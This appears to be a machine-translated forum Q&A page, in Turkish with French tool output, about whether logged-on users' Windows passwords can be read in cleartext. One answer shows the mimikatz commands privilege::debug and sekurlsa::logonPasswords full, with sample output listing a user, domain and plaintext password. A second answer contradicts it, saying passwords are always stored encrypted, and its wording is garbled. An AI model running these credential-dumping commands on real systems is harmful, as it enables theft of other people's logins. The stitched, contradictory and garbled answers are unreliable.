Yanıtlar:
Evet.
Oturum açmış kullanıcı (lar) ın cleartext şifrelerini atmak , mimikatz'in nasıl kullanılacağını açıklar :
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
...
Utilisateur principal : user
Domaine d'authentification : domain
kerberos :
* Utilisateur : user
* Domaine : domain
* Mot de passe : pass
Yok hayır.
Varsayılan olarak parola şifrelenir ve saklanır. Düz metin şifrem değil depolanır ve böylece görülemez. Bu varsayılan değiştirilebilir ancak kullanıcı şifreyi ayarlamadan önce yapmanız gerekir.